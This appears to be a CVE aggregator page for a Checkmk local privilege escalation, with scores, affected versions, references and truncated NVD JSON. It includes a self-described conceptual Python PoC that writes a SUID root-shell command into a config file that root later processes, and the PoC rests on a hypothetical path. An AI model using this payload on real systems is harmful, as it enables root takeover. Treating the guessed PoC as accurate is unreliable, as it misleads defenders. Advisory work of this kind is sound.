CVE-2025-39666

Description

Local privilege escalation in Checkmk 2.2.0 (EOL), Checkmk 2.3.0 before 2.3.0p46, Checkmk 2.4.0 before 2.4.0p25, and Checkmk 2.5.0 (beta) before 2.5.0b3 allows a site user to escalate their privileges to root, by manipulating files in the site context that are processed when the `omd` administrative command is run by root.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:checkmk:checkmk:2.2.0:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:checkmk:checkmk:2.2.0:b1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:checkmk:checkmk:2.2.0:b2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:checkmk:checkmk:2.2.0:b3:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:checkmk:checkmk:2.2.0:b4:*:*:*:*:*:* - VULNERABLE

Checkmk 2.2.0 (EOL)

Checkmk 2.3.0 < p46

Checkmk 2.4.0 < p25

Checkmk 2.5.0 (beta) < b3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2025-39666 (Conceptual)
# This script demonstrates how a low-privileged site user might exploit the file manipulation vulnerability.

import os
import sys

# Path to the file processed by 'omd' (Hypothetical path based on Checkmk structure)
TARGET_FILE = "/omd/sites/mysite/var/check_mk/conf.d/config.mk"

def exploit():
    print("[*] CVE-2025-39666 PoC - Checkmk Local Privilege Escalation")
    print("[*] Attempting to manipulate site files...")

    # Check if we have write permissions to the target
    if os.access(TARGET_FILE, os.W_OK):
        # Inject malicious command to be executed when root runs 'omd'
        # For example, adding a reverse shell or a simple command to create a SUID binary
        payload = "import os; os.system('cp /bin/sh /tmp/rootshell && chmod 4755 /tmp/rootshell')"

        try:
            with open(TARGET_FILE, 'a') as f:
                f.write("\n# Malicious config\n")
                f.write(payload)
            print(f"[+] Payload injected into {TARGET_FILE}")
            print("[*] Waiting for root user to execute 'omd' commands (e.g., omd restart)...")
            print("[*] Once executed, check /tmp/rootshell for root access.")
        except Exception as e:
            print(f"[-] Error writing payload: {e}")
    else:
        print("[-] Write access denied. Exploit failed.")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-39666
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-39666
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-39666/
[4] VulDB https://vuldb.com/cve/CVE-2025-39666
[5] https://checkmk.com/werk/18891

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-39666", "sourceIdentifier": "[email protected]", "published": "2026-04-07T13:16:44.847", "lastModified": "2026-04-14T15:39:05.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Local privilege escalation in Checkmk 2.2.0 (EOL), Checkmk 2.3.0 before 2.3.0p46, Checkmk 2.4.0 before 2.4.0p25, and Checkmk 2.5.0 (beta) before 2.5.0b3 allows a site user to escalate their privileges to root, by manipulating files in the site context that are processed when the `omd` administrative command is run by root."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-426"}, {"lang": "en", "value": "CWE-829"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:-:*:*:*:*:*:*", "matchCriteriaId": "C66704F1-0B5E-4B43-8748-987022F378F8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b1:*:*:*:*:*:*", "matchCriteriaId": "B068974F-6F67-4CBB-B567-FCED86E28F22"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b2:*:*:*:*:*:*", "matchCriteriaId": "EA70F36A-EEF6-48DC-B15E-055D0DE8A052"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b3:*:*:*:*:*:*", "matchCriteriaId": "B2017F38-38DB-4E96-B34F-160BC731CBBE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b4:*:*:*:*:*:*", "matchCriteriaId": "0949F399-371B-409C-AF9F-32690D881440"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b5:*:*:*:*:*:*", "matchCriteriaId": "42E1E31A-B5CC-45F2-A2E5-3EEF735499BA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b6:*:*:*:*:*:*", "matchCriteriaId": "4B364FCA-500C-458E-B997-82CD0B1D24F9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b7:*:*:*:*:*:*", "matchCriteriaId": "0B32E657-917B-482B-B6A4-3D3746992A4F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:b8:*:*:*:*:*:*", "matchCriteriaId": "2119C732-E024-4DA6-8E47-9E08E5E12602"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:i1:*:*:*:*:*:*", "matchCriteriaId": "4F0B99A8-A124-43BD-B8AA-EECC9112346F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p1:*:*:*:*:*:*", "matchCriteriaId": "3FB7221E-BE9F-4529-8E07-8AD547FA3208"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p10:*:*:*:*:*:*", "matchCriteriaId": "30A074AD-9499-46E3-AB67-D6CEE3AA01C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p11:*:*:*:*:*:*", "matchCriteriaId": "A8BD0240-A22B-4273-BD47-C35A8C12E127"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p12:*:*:*:*:*:*", "matchCriteriaId": "DAA5680F-1DD0-48AA-BB7F-15B27365F0FA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.2.0:p13:*:*:*:*:*:*", "matchCriteriaId": "BC2F31CA-D4EB-44E6-9A09-5255D33F4A88"}, {"vu ... (truncated)